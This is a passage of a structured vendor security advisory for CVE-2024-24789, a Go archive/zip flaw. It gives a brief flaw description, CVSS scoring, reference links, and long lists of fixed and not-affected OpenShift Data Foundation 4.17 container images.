"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2292668", }, ], notes: [ { category: "description", text: "A flaw was found in Golang. The ZIP implementation of the Go language archive/zip library behaves differently than the rest of the ZIP file format implementations. When handling ZIP files with a corrupted central directory record, the library skips over the invalid record and processes the next valid one. This flaw allows a malicious user to access hidden information or files inside maliciously crafted ZIP files.", title: "Vulnerability description", }, { category: "summary", text: "golang: archive/zip: Incorrect handling of certain ZIP files", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-24789", }, { category: "external", summary: "RHBZ#2292668", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2292668", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-24789", url: "https://www.cve.org/CVERecord?id=CVE-2024-24789", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-24789", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-24789", }, ], release_date: "2024-06-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", 